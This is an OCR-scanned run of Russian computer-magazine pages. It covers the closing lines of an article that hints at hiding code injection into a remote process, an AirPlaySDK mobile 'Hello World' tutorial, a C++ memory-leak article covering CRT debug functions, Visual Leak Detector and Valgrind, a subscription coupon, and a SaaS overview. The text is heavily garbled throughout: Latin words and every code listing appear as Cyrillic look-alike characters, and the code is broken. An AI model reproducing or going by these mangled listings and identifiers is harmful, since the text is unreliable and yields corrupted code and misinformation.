можно заюзать для сокрытия инжекта своего кода в удаленном 
процессе! Но уж это я оставлю тебе в качестве информации к раз- 
мышлению, тем более, что все необходимые для этого ингредиенты 
в статье показаны. 

Заключение 

Казалось бы — что может быть скучнее консоли? Но и там, если хо- 
рошенько покопаться дебаггером, найдется куча интересного — тем 
более, что все найденное можно использовать для своих грязных 
делишек! То ли еще будет... Читай свой любимый журнал ][ — обе- 
щаю новые и захватывающие темы! Удачного компилирования, и да 
пребудет с тобой Сила! т 
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ССЮІЫб 



■ ■ Александр «ЬегЛеізсЬ» Перечнев (регесИпеѵ.сот) 



КРОССПЛАТФОРМЕННЫИ 

кодингдля 

МОБИЛЬНЫХ ПЛАТФОРМ 



Покоряем ЮЗ, АпсІтісІ. Васіа, ЗутЬіап и ѴѴМ 
с помощью АігРІауЗІЖ 

©Ни для кого не секрет, что кодингдля мобильников - дело инте- 
ресное, прибыльное и перспективное. Я всегда запускаю на КПК 
какую-нибудь игру, когда спускаюсь в метро, то же самое делают и 
окружающие меня люди. Но, к сожалению, нынешнее разнообразие 
платформ часто заставляет нас ограничить круг поддерживаемых 
устройств. 



Что мы имеем? 

Компания Ісіеаѵѵогкз І_аЬз позаботилась о нас и создала АігРІау50К. 
Данный инструментарий позволяет написать код на С++ один раз и 
компилировать его в нативные приложения для платформ ІРЬопе 
05, АпбгоісІ, 5атзипд Ваба, 5утЬіап, ѴѴіпсІоѵѵз МоЬіІе, ВРЕѴѴ, Раіт/ 
НР ѴѴеЬ05 и Маето. Ну как, впечатляет? Крометого, АігРІау50К 
имеет отличную документацию (правда, на английском языке) и 
позволяет использовать уникальные особенности той или иной 
платформы. Ты можешь бесплатно скачать АігРІауВйК с сайта 
аігріаѵзсік.сопп и попробовать, а можешь и купить Іпбіе-лицензию 
всего лишь за 99$. 



Создание проекта 

АігРІауВйК позволяет писать приложения в ѴѴіпсІоѵѵз или в Мае 05, 
а также хорошо интегрируется с Ѵізиаі 5іисІіо (начиная с версии 6.0) 
и ХСобе соответственно. Я буду ориентироваться на Ѵізиаі 5іибіо, но 
уверен, что для ХСобе все будет выглядеть ничуть не сложнее. 

Итак, ты скачал и установил АігРІау50К и Ѵізиаі 5іи б іо. Создай пап- 
ку "НеІІоѴѴогІсІ" в каком-нибудь месте своего диска. Именно в этой 
папке будет размещаться наш первый проект. 

Главным файлом всего решения является НеІІоѴѴогІсІ.ппкЬ в папке 
НеІІоѴѴогІсІ, создадим его и откроем для редактирования, а затем 
впишем туда следующее содержимое: 
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Окно со списком поддерживаемых платформ 



Неііоіліогісі .ткЬ 

орІііопБ { 

5 Зе - сі а! а - сі і г= " сі а1:а " 

} 

біез { 

(зоигсе) 

Неііоіліогісі . срр 
Неііоіліогісі . б 
НеІІоІлІогІсІМаіп . срр 

} 

зиЬрго]ес1:5 { 

Іы2с1 

} 



Здесь параметр зЗе-сІаІа-сІіг секции орііопз определяет 
папку, в которой будут находиться ресурсы будущего 
приложения. Это могут быть изображения, музыка или 
что-нибудь еще. Создай объявленную нами папкубаіа в 
папке НеІІоѴѴогІсІ. Секция біез содержитсписокфайлов 
проекта. В скобках мы указали папку зоигсе, которую 
тоже следует создать. В нее мы поместим три файла: 
НеІІоѴѴогІсІ .срр, НеІІоѴѴогІсІ. б и НеІІоѴѴогІсІМаіп.срр. В 
секции зибрпфесіз находятся названия библиотек, кото- 
рые мы хотим использовать в своем проекте. 



5Й1йЖЖ рменный 



Итак, подготовка проекта закончена, и мы можем при- 
ступить к программированию. Для этого щелкни два 
раза на файле НеІІоѴѴогІсІ. ткЬ и насладисьлоготипом 
АігРІауЭОК. Насладился? Это еще не все, ведь затем пе- 
ред твои ми глазами откроется проект в Ѵізиаі Эіисііо. Вбей 
в файл НеІІоѴѴогІсІМаіп.срр код, приведенный во врезке 
«НеІІоѴѴогІсІМаіп.срр», а я пока поясню, что тут кчему. 



НеІІоѴѴогІсІМаіп.срр 

#іпс1исІе "зЗе.б" 
#іпс1исІе "Неііоіліогісі . б" 



іпі: таіп() { 

СатеІпі1:() ; 

іл/бііе (Ігие) 

{ 

53еОеѵісеѴіе1сІ(0) ; 

53еКеуЬоагсІІІрсІа1:е( ) ; 

Ьоо гезиіі: = СатеІІрсІа1:е(); 

і-р ((гезиіі: == Раізе) | | 

(53еКеуЬоагсІСе1:51:а1:е(53еКеуЕ5с) & 
53Е_КЕѴ_5ТАТЕ_ООІлІІ\І) | | 
53еКеуЬоагсІСе1:51:а1:е(53еКеуІ_5К) & 
53Е_КЕѴ_5ТАТЕ_ООІлІІ\І) | | 
(зЗе0еѵісеСбеск(2иі1:Р^ие5І:( ) ) ) 

Ьгеак; 

СатеКепсІег(); 

} 

Сате5би1:сІоіл/п(); 

} 

С помощью директивы #і п сіи сі е зЗе.б мы подключаем 
стандартный заголовочный файл АігРІауЭОК, который 
дает нам возможность работать с мобильным устрой- 
ством. Функцию ОатеІпіД) мы напишем сами. Она 
будет инициализировать нужные нам переменные, 
создавать объекты, загружать ресурсы и выполнять 
прочие действия сразу же при старте программы. 
Функция зЗе ОеѵісеУіе ІсІ (. .) останавливает работу 
устройства на указанное в параметре время и дает 
операционной системе возможность выполнить какие- 
нибудь действия. В качестве параметра этой функции 
мы передали ноль, и потому получим минимально 
возможную задержку, разрешенную операционной си- 
стемой. зЗеКеубоагбІІрсІаІеО обновляет информацию 
отекущем состоянии клавиш мобильника и проверяет, 
не нажимал ли пользователь какие-либо клавиши во 
время прохода цикла. Функцию ОеШрбаІеО мы тоже 
напишем сами. В ней обычно размещается вся логика 
работы приложения. Если ты пишешь игру — то в этой 




> СІѴСІ 



Откомментированный 
и оформленный исхо- 
дный код ты можешь 
найти на диске. 




НТТР://ѴѴѴШ 

I г 

> Ііпкз 

• На сайте проекта 
АігРІауЭОК можно 
скачать весь инстру- 
ментарий, а также 
найти качествен- 
ную документацию: 
аігріаузсік.сот . 

• Есть такой сайт, где 
мелкомягкие бес- 
платно раздают Ѵізиаі 
Эіисііо студентам: 

сігеатзрагк.сот . 




Кроме двухмерной 
графики АігРІауЭОК 
дает возможность 
создавать трехмер- 
ные игры, работать с 
6Р5, звуками, списка- 
ми контактов, сетью, 
видео и кучей других 
штучек. 




> ѵѵагпіпд 

Не переусердствуй, 



сидя за компьютером. 
Обязательно выходи 
на улицу, чтобы раз- 
мяться и подышать 
свежим воздухом, а 
заодно купить свежий 
номер ][ :). 
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ССЮІЫб 



. Аігріау - к86 5ітиІі№г I <=і | ІИЁ&ИІ 



РІІе СОПІІдигаІійгі РГ4ІДОПС4Я Еѵ(ЛІі 
КетоГе СопІгоІ Меігісі Неір 




Окно симулятора с нашим НеІІоѴѴогІсІ-приложением 



функции следует проверять, не умер ли очередной монстр после 
выстрела пользователя. Функция возвращает Іше, если приложе- 
ние продолжает свою работу, и ба Іэе, если, например, пользова- 
тель нажал «Выйти из игры». Далее следует проверка, не захотел 
ли пользователь выйти из приложения, нажав соответствующий 
пункт меню или клавишу телефона, и не просит ли операционная 
система наше приложение завершиться (в случае положительно- 
го результата завершается главный цикл). Если же приложение 
должно продолжить работу — идем дальше. В ОатеРепсІегП, кото- 
рую мы опять же создадим самостоятельно, идет отри совка всего и 
вся на экран. И, наконец, ОатеЗЬиісІоѵѵпО (уже четвертая пока что 
несуществующая функция) завершает работу нашего приложения, 
сохраняя результаты, освобождая память и совершая прочие не- 
обходимые операции. 

Ну что же, главную функцию приложения мы разобрали. Стоит отме- 
тить, что файл НеІІоѴѴогІсІ Ма іп.срр — это шаблон. Такой файл с прак- 
тически тем же содержанием будет присутствовать во всех проектах, 
которые ты будешь создавать при помощи АігРІауЗОК. 

Описываем логику приложения 

Теперь самое время заняться функциями, которые будутопреде- 
лять непосредственно логику приложения. Для этого открой файл 
НеІІоѴѴогІсІ.срр и вбей туда код из врезки «НеІІоѴѴогІсІ. срр»: 




Пример трехмерного приложения в АігРІауБйК 

Кактыуже заметил, код файла НеІІоѴѴогІсІ .срр содержитте функции, 
которые я обещал описать. Ничего сложного в этом листинге нет. Он 
всего лишь закрашивает экран черным цветом и выводит посередине 
зеленый круг. 

Теперь стоитописать прототипы этих функций в заголовочном файле 
НеІІоѴѴогІсІ. И, чтобы иметь возможность их вызова из главной функции 
таіп(). Выглядеть это будет следующим образом: 

НеІІоѴѴогШ.Ь 

#іТпсІеТ НЕИОІлІОКЮ_Н 
#бебіпе НЕІ_І_0ІлШІ_0_Н 



НеІІоѴѴогІсІ. срр 

#іпс1исЬ "ІЫ20.6" 
ѵоісі СатеІпііО { 

Іы20ІпіТ( ) ; 

} 

Ьоо! СатеІІрсІабеО { 

геіигп ігие; 

} 

ѵоісі СатеКепсІег() { 

Іы2й5е1:Со1оиг (0ХРР00Ѳ0Ѳ0) ; 
Іы2йРі11Кесі:( 

СІіл/5Ѵес2(0, 0), 

СІм5Ѵес2(Ім20Сеі5игТасеІлІісІ1:Іі() , 
Ім20ееі5иг-РасеНеі§Іі1:() ) 

); 

Іы2О5еіСо1оиг(0хРР00РР00) ; 
Іы20Рі11Агс( 

С Ііл/БѴес 2 ( Іы20Се1:5 и гРа с еІлІісИ: б ( ) /2 , 
Іы20Се1:5ипТасеНеі§ІтІ:()/2) , 
СІіл/5Ѵес2(30, 30), 

0, 0x800 * 2 
); 

Ііл/205игТасе5Ііоіл/( ) ; 

} 

ѵоісі СатеБІіиісІоыпО { 

Ім20Тегтіпа1:е() ; 

} 



ѵоісі СатеІпііД); 

Ьоо СатеІІрсІаіеО; 
ѵоісі СатеКепсІег(); 
ѵоісі СатеБІіиісІоыпО; 

#епсІі-Р 

Листинг в комментариях не нуждается. Код нашего приложения готов, 
иты можешь запустить его на исполнение, нажав клавишу Р5 в Ѵізиаі 
Зіисііо. Перед тобой откроется окно эмулятора, которое продемонстри- 
руетнаше первое творение на АігРІауЗОК. 

Сборка проекта 

Ну что же, настало время продемонстрировать главное преимуще- 
ство АігРІауЗОК — переносимость приложений с одной платфор- 
мы на другую. Выбери «ѲСС (АРМ) Реіеазе» в качестве активной 
конфигурации проекта и нажми Р5. Перед тобой появится окно 
Аігріау Зузіепп ОерІоутепіТооІ. Отметь пункт «АРМ 6СС Реіеазе» 
и нажми «ІЧехІ». Следующий шаг пока что не представляет для нас 
ничего интересного, поэтому нажми «ІМехІ» еще разок. Воттут-то и 
требуется отметить то многообразие платформ, под которое мы хотим 
скомпилировать наше приложение. Давай отметим ОС Ваба, нажмем 
«Оеріоу АН» и подождем окончания компиляции нашего проекта. 

На этом создание первого приложения на основе АігРІауЗО К окон- 
чено. Теперь самое время почитать документацию по этому инстру- 
ментарию, ведь он поддерживаетогромное количество функций 
мобильныхустройств, которыеты можешь использовать в своих 
приложениях! ц-с 
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Почти 3 000 000* настоящих мужчин 

смотрят МАМ ТУ 



Россия, население 4+ (ТМ5 Россия), декабрь 2(М 0 - февраль 201 1 , накопленный охват (Веб) 

' ч , Реклама 






Программерские 
типсы и триксы 

Ловим тетогу Іеакз 



Локальное 
хранилище 
потока, 
или что такое 
П$ 









О В «Диспетчере задач» очень часто можно увидеть, что некоторые программы занимают совер- 
шенно неприличное количество памяти. Особенно это свойственно интернет-браузерам. Рано или 
поздно перед каждым разработчиком встает задача отлова утечек памяти. Сегодня мы узнаем, 
как это сделать в языке С++ на М5ѴС. 



Искать утечки памяти мы будем в ОС ѴѴіпсІоѵѵз, а для сборки кода 
использовать компилятор от МісгозоД. Существует множество 
способов избежать мемори ликов, но основное правило этой 
борьбы можно сформулировать как «класть на место все, что взя- 
ли». К сожалению, в «боевом кодинге»такое не всегда возможно. 
Банальный человеческий фактор или сработавший ехсерііоп за- 
просто может отменить выполнение оператора беіеіе. 

В этой статье мы не будем рассматривать, что нужно делать, а 
что не стоит, чтобы память не утекала. Мы будем действовать в 
контексте уже имеющейся проблемы: утечка есть и нам надо ее 
перекрыть. 

Для решения этой задачки многие программисты используют 
сторонние библиотеки (а самые крутые пишут собственные менед- 
жеры памяти), номыначнемс чего-нибудь попроще — например, 
воспользуемся средствами ОеЬид ОРТ. 

йеЬид СРТ 

Для использования йеЬид СРТ надо подключить соответствующий 
хи дер и включить использование йеЬид Неар АІАос Мар. Делается 
это всего несколькими строками кода: 

Подключение йеЬид СРТ 

#І-Рс1е-Р _ОЕВЦС 
#іпс1исІе <сг1:сІЬ§. б> 

#сІеТіпе _СКЮВе_МАР_Аи_ОС 

#епсІі-Р 

После этих действий при выделении памяти через пеѵѵ и 
таІІосП данные будут оборачиваться в специальную структуру 
_Сг1:МеппВІоскНеасІег. С помощью этой обертки мы сможем узнать 
имя файла и строку, в которой резервировалась ликнутая память, 
ее объем и сами данные. Все записи объединены в двусвязный 
список, поэтому по нему можно легко пробежаться и найти про- 
блемные участки. 

Структура _СгІМетВІоскНеасІег 

Іуресіе-Р біігіісі: _Сг1:МетВ1оскНеасІег 

{ 



Бііписі: _Сг1:МетВ1оскНеасІег * рВІоскНеасІегМехІ:; 

БІігисІ: _Сг1:МетВ1оскНеасІег * рВІоскНеасІегРгеѵ; 
сбаг* БіРіІеМате; 
іпі: пІ_іпе; 

5І2е_1: пйаіаБіге; 
іпі: пВІаскІІБе; 

1оп§ ІКедиеБІ:; 

ип5І§песІ сбаг §ар[пІ\ІоМапБІ_апсІ5І2е] ; 

ип5І§песІ сбаг сіаіа [ гЮаѣаБіге] ; 

ип5І§песІ сііаг апо1:ІіегСар[пІ\ІоМап5І-апсІ5І2е] ; 

} _Сг1:МетВ1оскНеасІег; 

Чтобы пройтись по этому списку, нужно воспользоваться функцией 
-СгЮитрМетогуБеакзО. Она не принимает никаких параметров, 
а просто выводит спи со к утекших блоков памяти. Но, к сожалению, 
онаничегонеговоритнамофайлеи строке, в которых выделялась 
память. Результат работы этой функции выглядит примерно так: 

Вывод _СгЮитрМетогуІ_еак5() 

ОеіесіесІ тетогу Іеакз! 

Оитріп§ оЬдесіБ -> 

{163} погтаі Ыоск а* 0x00128788, 4 Ьуіез 1оп§. 
йаііа : < > 00 00 00 00 

{162} погтаі Ыоск а* 0x00128748, 4 Ьуіез 1оп§. 
йаііа : < > 00 00 00 00 
ОЬдесІ: сіитр сотріеіе. 

Вот оно как: в МісгозоД Ѵізиаі С++ 6.0 в файле сгІбЬд.Ь имело место 
переопределение функции пеѵѵ, которое должно было точно пока- 
зать файл и строку, в котором происходило выделение памяти. Но 

оно не давало желаемого результата — РІ БЕ і БІ N Е всегда 

разворачивались в сгЫЬд.Ь Ше б пе 51 2. В следующих версиях 
МісгозоИ вообще убрали эту фичу, и весь груз ответственности лег 
на программистов. Сделать нормальный вывод можно с помощью 
следующего переопределения: 

Переопределение пеѵѵ 

#сІе6пе пем пеи/( _І\ІСЖМАІ__ВІ_ОСК, РНЕ , ІЛИЕ ) 
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ѴізиаІ Ьеак ІЭеІеЪог 



Эту строчку желательно вынести в какой-нибудь общий заголо- 
вочный файл и подключать его после сгІбЬд.Ь. Теперь перед нами 
стоит задача записать все это в какой-нибудь лог или хотя бы вы- 
водить в консоль. Для перенаправления вывода нам потребуются 
две функции: _Сгі5еіРерогіМосІе и _Сгі8еіРерогіРіІе. Вторым па- 
раметром _Сгі8еіРерогіРіІе может быть хендл нашего лог-файла 
или флаг вывода в зісіоиі. 

Перенаправление вывода 

_Сг*5е*КерогІ:МосІе( _СКТ_ЫАКІ\Ц _СКЮВе_МООЕ_РИЕ ); 

// выводим все в зігсіоиі: 

_Сг*5е1:Керог*:Рі1е( _СКТ_ІлІАКІ\Ц _СКТОВС5_РІІ_Е_5ТООІЯ ); 

У этого метода есть еще одна проблемка — он выводит информа- 
цию о памяти, которая не утекла, а просто не успела вернуться. 
Это, например, можетбыть какая-нибудь глобальная переменная 
или объект. Нам нужно как-то удалить эти куски памяти из вывода 
_СгШштірМетогуІ_еак5(). Делается это следующим образом: 

Ограничение зоны действия _СгШитрМетогуІ_еак5() 

іпі: _ѣтаіп(іп1: аг§с, _ТСНАК* аг§ѵ[]) 

{ 

_Сг1:Мет51:а1:е _шб; 

_Сг1:МетСбескроіп1:(&_т5) ; 

// Боте 1о§іс §оез беге. . . 

_Сг1:Мет0итрА110Ьдес1:55іпсе(&_т5) ; 

геТигп 0; 

} 



Мы записываем начальное состояние памяти в специальную 
структуру с помощью функции _СгІ Мет С ЬескроіпД), а в конце, ис- 
пользуя _СгіМет0итрАи0Ьіес1:58іпсе(), выводим все, что утекло 
после того, как мы сделали слепок памяти. 

Воттак вот, с помощью нехитрых функций йеЬид ОРТ, мы можем 
достаточно эффективно бороться с мемори ликами в нашей про- 
грамме. Конечно, это не заменит серьезных библиотек по отлову 
утечек, но вполне подойдет для небольших проектов. 

ѴізиаІ Іеак Оеіесіог 

ѴізиаІ І_еак Оеіесіог — это уже сторонняя библиотека, но по сути 
она является надстройкой над ОеЬид ОРТ, которую мы рассмотре- 
ли чуть раньше. Пользоваться ей достаточно просто — надо всего 
лишь включить заголовочный файл ѵШ.Ь в любой файл проекта. Но 
с двумя оговорками. 

Во-первых, если у нас в проекте есть несколько бинарных мо- 
дулей (ОН или ЕХЕ), то іпсіибе для ѵШ.Ь надо делать как мини- 
мум в одном исходном файле для каждого модуля. То есть, если 
у нас после компиляции на выходе получается тоби1е_1 .611 и 
тобиІе_2.би, то нам нужно сделать #іпсІисІе <ѵШ,Н> как минимум в 
тобиІе_1 .бив тобиІе_2.б. 

Во-вторых, включение заголовочного файла ѴізиаІ І_еак Оеіесіог 
должно происходить после включения пре ком пил ед хи дера. То 
есть, после зісіабх. И и других подобных файлов. После выполнения 
этих условий достаточно запустить программу в дебаг-сборке, и 
библиотека сразу начнет работать. 

ѴізиаІ І_еак Оеіесіог можно настроить под свои нужды. Конфиг 
хранится в файле ѵіб.іпі, который, в свою очередь, лежит в дирек- 
тории с установленным ѴШ. Файл с настройками можно скопиро- 
вать в папку с проектом, и тогда библиотека будет использовать эту 
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Официальный сайт ѴаІдгіпсІ 



копию с индивидуальными настройками для каждого проекта. 
Параметров для тюнинга Ѵізиаі І_еак Оеіесіог предостаточно. На- 
пример, можно настроить тот же вывод в файл или в дебаг консоль 
студии. Делается это ключом РерогіТо. По умолчанию там стоит 
«беЬиддег», но можно заменить это значение на «біе» или «ЬоіЬ». 
Надеюсь, их смысл пояснять не нужно. 

Если мы включим вывод в файл, то надо указать путь к этому файлу 
с помощью параметра РерогіЕіІе. Также можно выбрать кодировку 
файла с помощью РерогіЕпсосІіпд: ипісобе или А5СІІ. 

Еще есть интересная опция поиска ликов библиотеки в самой себе 
(БеІГГезі). Да, бывает и такое. Если постараться, то можно получить 
в оіЛріЛ что-то вроде ЭТОГО: 

ЕККОК: Ѵізиаі І_еак Оеіесіог: ОеіесіесІ а тетогу Іеак 
іпіегпаі іо Ѵізиаі І_еак йеіесіог. 

Еще ѴШ позволяет ограничить размер дампа памяти, выводимого 
в лог, или вообще подавить этот вывод, настроить глубину и метод 
проходки по стеку и так далее. Но это уже специфичные вещи, 
которые некоторым могут пригодиться, а некоторым и нет. В общем 
и целом Ѵізиаі Ееак йеіесіог прост, удобен и не требует много кода 
для включения режима поиска утечек. 

ѴаІдгіпсІ 

Все, что мы рассмотрели выше, было актуально для ѴѴіпсІоѵѵз и 
М5 Ѵізиаі Зіисііо. Но есть и другие ОС. ѴаІдгіпсІ как раз для них. Он 
работает вЫпихиМасОБХи используется не только для отлова 
мемориликов.ноидля отладки памяти и профилирования (сбор 



характеристик работы программы). По сути, ѴаІдгіпсІ является 
виртуальной машиной, использующей методы ЛТ-компиляции. Ее 
усилиями программа не выполняется непосредственно на процес- 
соре компьютера, а транслируется в так называемое «промежуточ- 
ное представление». С этим представлением и работает ѴаІдгіпсІ. 
Точнее, работают его инструменты, но об этом чуть позже. 

После обработки промежуточного представления ѴаІдгіпсІ пере- 
гоняет все обратно в машинный код. Такие действия значительно 
(в 4-5 раз) замедляют выполнение программы. Но это вполне обо- 
снованная плата за контроль расхода памяти. 

Как я говорил выше, ѴаІдгіпсІ предоставляет несколько инстру- 
ментов. Самый популярный из них — Метсбеск. Он заменяет 
стандартное выделение памяти языка С собственной реализаци- 
ей. МеппсЬеск обнаруживает попытки использования неинициа- 
лизированной памяти, чтение/запись после её освобождения и с 
конца выделенного блока, а также утечки памяти. 

Есть и другие инструменты, например АсШгсЬеск — более лег- 
кая, но менее функциональная версия Метсбеск. Инструменты 
Неідгіпсі и 0Р0 используются для поиска ошибок в многопоточном 
коде. Иначе говоря, ѴаІдгіпсІ гораздо более мощная штука, чем 
просто библиотека по поиску мемори ликов. 

Заключение 

Утечки памяти — одна из самых распространенных проблем в 
программировании. Даже самые опытные из нас могут заиметь 
парочку ликов. Инструментов для их отлова великое множество, 
и эти несколько страниц должны помочь тебе начать борьбу с 
тетогу Іеакз. ц-И 
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1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта зЬор. 

діс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных 
документов — купона и квитанции — 
любым из нижеперечисленных способов: 

• на е-таіі: зиЬзспЬейдІс.ги : 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 1 5280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 
5 эт., офис № 21 , 

ООО «Гейм Лэнд», отдел подписки. 

Внимание! Если произвести оплату в февра- 
ле, то подписку можно оформить с апреля. 

Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 
Москве в пределах МКАД 






12 НОМЕРОВ - 2200 руб 
6 НОМЕРОВ - 1260 руб. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ ЖУРНАЛ 
НАМНОГО ДЕШЕВЛЕ! 




+ 



ПРИ ПОДПИСКЕ НА КОМПЛЕКТ 
ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 0Ѵ0: - ОДИН 
НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ. НЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 

ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 

ЕСТЬ ВОПРОСЫ? п иши на іпГойдІс.ги или звони по бесплатным 
телефонам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3- 
999 (для жителей других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 2011 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 
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§аа8 для малого 
и среднего бизнеса 

Переводим стандартные сервисы в облако 

Развитие всего в этом мире идет по спирали, и ІТ-технологии — не исключение. После эпохи ПК 
разработчикам ПО (да и самим пользователям) стали интересны онлайн-ресурсы, предлагающие 
замену привычным программам. Доля таких решений на рынке постепенно увеличивается, и се- 
годня вместо того, чтобы покупать коробку, можно просто подключиться к сервису, обеспечиваю- 
щему нужный функционал. 



В чем преимущества 5аа$? 

Классическая схема покупки ПО в организации вы глядитта к. Админи- 
стратор покупаетОЕМ- или коробочную версию, которую и устанавли- 
вает на пользовательском ПК или сервере. К этому привыкли, многие 
считаюттакой механизмудобным и понятным. Вотпрограмма, вот ком- 
пьютер, на котором она выполняется. Постепенно пришли ктому, что 
хранитьспециализированные (и, какправило, дорогие) приложения 
на персональном компьютере несколько накладно, в итоге появились 
серверытерминалов и виртуальные десктопы, отчасти решающие 
проблему уменьшен ия количества копий. Но взамен появилась не- 
обходимость в развертывании отдельного сервиса, для которого тре- 
буется оборудование, место в стойке и, опять же, ПО. Добавим к этому и 
стандартный набор любой организации — почтовый сервис групповой 
работы, СРМ, корпоративный антивирус, сервис видеоконференций и 
другие. Все это хозяйство требует денег на поддержание, включая со- 
держание штата хорошо подготовленных ІТ-сотрудников, обновление 
ПО и железа, потребление большого количества электроэнергии итак 
далее. То есть, при внедрении получаем значительные затраты, даже 
без учета лицензий на само ПО. При этом не всегда выбранный про- 
дукт может обеспечивать требуемую функциональность. Например, так 
часто бываете СРМ-системами, которые не подходят под требования 
конкретной организации или вообще их внедрение по разным причи- 
нам прошло неудачно. Но ведь определенные затраты уже понесены. 
Плюс со временем купленная программатребуетобновления, за что 
в большинстве случаевтакже необходимо доплачивать и, вероятно, 
докупать более мощный сервер. Крометого, организация безопас- 
ного доступа к сервису полностью ложится на плечи айтишников, от 
подготовки которых зависит результат. Использование ѴРЫ выручает 
лишь отчасти, так как провайдеры часто блокируют нестандартные 
порты, что создает дополнительные трудности. А с другой стороны этой 
проблемы находятся компании-разработчики ПО, которыетеряют 
большие деньги из-за пиратства. В общем, ситуация, как ни посмотри, 
мало кого радует. 

Предоставление подписки на определенный сервис (5аа5, 5о1і:\л/аге 
аза Зегѵісе) позволяет догнать сразудвухзайцев. Организация 
практически сразу получает доступ к необходимым приложениям, без 
больших начальных затрат и трудностей первоначального внедрения. 
При этом в дальнейшем доплата производится исключительно за 
продление подписки и, какправило, уже со скидкой, нетребуя средств 
на поддержание инфраструктуры. Новые возможности подписчик 
получает автоматически (в пределахтарифа, разумеется). Некоторые 
сервисы предлагают помесячную оплату, поэтому на период отпусков 
можно сэкономить, взяв меньшее количество лицензий. Тестовый 
период, предоставляемый практически всеми ресурсами ЗааЗ, дает 



возможность определиться с выбором конкретного решения. 
Софтверные компании, реализуя продукты в виде ЗааЗ, полностью 
решают проблему пиратства. В рамках этой статьи мы постараемся 
разобраться втом, что именно они нам предлагают. 

Корпоративная почта 

Конечно, в случае с электронной почтой многие пытаются сэкономить, 
выбрав бесплатные сервисы. Для компаний это не выход- к письмам, 
отправленным сбесплатной почты, у клиентов компании доверия 
не будет. Да и несолидно это, ведь наличие своего домена -один из 
признаков серьезности организации. В настоящее время некоторые 
почтовые сервисы предлагаютуслуги для тех, кому нужна корпоратив- 
ная почта, без дополнительных вложений. 

Среди них — Яндекс. Почта для домена ( рсісі.ѵапсіех.ги ). Просто ука- 
зываем адрес домена (в списке уже присутствуют домены, прописан- 
ные в Яндекс. Вебмастер) и редактируем МХ-запись по полученной 
подсказке. Это все. Администратор получает интерфейс, при помощи 
которого он можетуправлять почтовыми аккаунтами. Возможен до- 
ступ пользователей по протоколам РОРЗ/ІМАР, через веб-интерфейс 
и мобильныеустройства. Плюс мгновенные сообщения через 
Я. Онлайн, почтовая книга и приятные мелочи вроде Яндекс. Бар 
для браузера. По умолчанию поддерживается 1000 аккаунтов, этого 
обычно более чем достаточно (иначе лучше все-таки свой сервер), 
но их число можноувеличить. Причем заметь, все это бесплатно. 

Что, сучетом известной стабильности яндексовых серверов, делает 
их предложение более чем заманчивым. Гугл также предоставляет 
возможность привязать домен кпочте, причем в нескольких вариан- 
тах. Стандартный пакет ОоодІеАррз для бизнеса ( доодіе.сопп/аррз/ 
іпЦ/ги/Ьизіпезз ) даетнам полный спектр приложений — почта ѲМа і I 
с привязкой к корпоративному домену, общий календарь со списком 
задач, документы, группы, сайты и видео боодіе. Размер почтового 
ящика ограничен 2 Гб. Функционал приложений известен любому 
пользователю, имеющему я щи к на 6МаіІ. Но гугл пошел еще дальше. 
Выбрав профессиональный пакет(50$за аккаунтв год) получаемуве- 
личенный до 25 Гб объем почтового ящика, гарантию бесперебойной 
работы, поддержку, возможность переноса действующих почтовых 
аккаунтов на Ѳтаіі, доступ к АРІ-расширениям, позволяющим инте- 
грировать различные ИТ-системы. Крометого, подписчики получают 
доступ ксистеме безопасности электронной почты Розбпі, обеспе- 
чивающей улучшенную фильтрацию спама и вирусов, шифрование 
сТІ_5, настраиваемые правила обработки вложений, архивацию и 
восстановление, поиски экспорт писем. Первыетридцать дней ука- 
занными вкусностями можно пользоваться бесплатно. Для сомневаю- 
щихся в выборе доступны «Истории успеха», в которых действующие 
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подписчики делятся своими впечатлениями о переходе 
на Ѳоодіе Аррз. Списокприложений сторонних раз- 
работчиков, которые можно интегрировать при помощи 
АРІ, ты найдешь на Ооодіе Аррз Магкеіріасе ( оодіе. 
сот/епіегргізе/тагкеіріасе ). Вотздесьуже начинаешь 
понимать всю мощь Ооодіе Аррз. В нескольких категориях 
представлено более двух сотен приложений — средства 
администрирования и взаимодействия с клиентами, 
инструменты управления финансами, менеджеры задач, 
утилиты поиска, синхронизации данных, ѴоІР и многие 
другие. Подключаемые через АРІ приложения реализова- 
ны какв привычном варианте, требующем установки, так 
и в виде облачныхсервисов. Кслову, часть приложений 
из Аррз Магкеіріасе бесплатна. 

Яндекс и Гугл — не единственные варианты. Почтовый 
ящик можно разместить на МехІМаіІ( пехісогр.ги ). із-таіІЬіг 
и других подобных ресурсах. 



Алло, мы ищем таланты 



Как известно, «кадры решают все». 
Высококвалифицированные (да и просто хорошие) 
работники являются одной из ценностей любой 
организации. Компания старается привлечь и 
удержать полезных работников. Технология поиска 
подходящих сотрудников называется Таіепі тап- 
адетепі или НСМ (Нитап Сарііаі Мападетепі) 
и основывается на двух основных показателях 
— трудоспособность и потенциал. Программы 
и сервисы для управления «талантами» сейчас 
переживают бурный рост. Среди 5аа5 наиболее 
известными являются сервисы Таіео ( ) 

и БиссеззРасІогз ( ). Подобные 

решения позволяют вести базу сотрудников, 
вакансий, резюме, управлять встречами. 
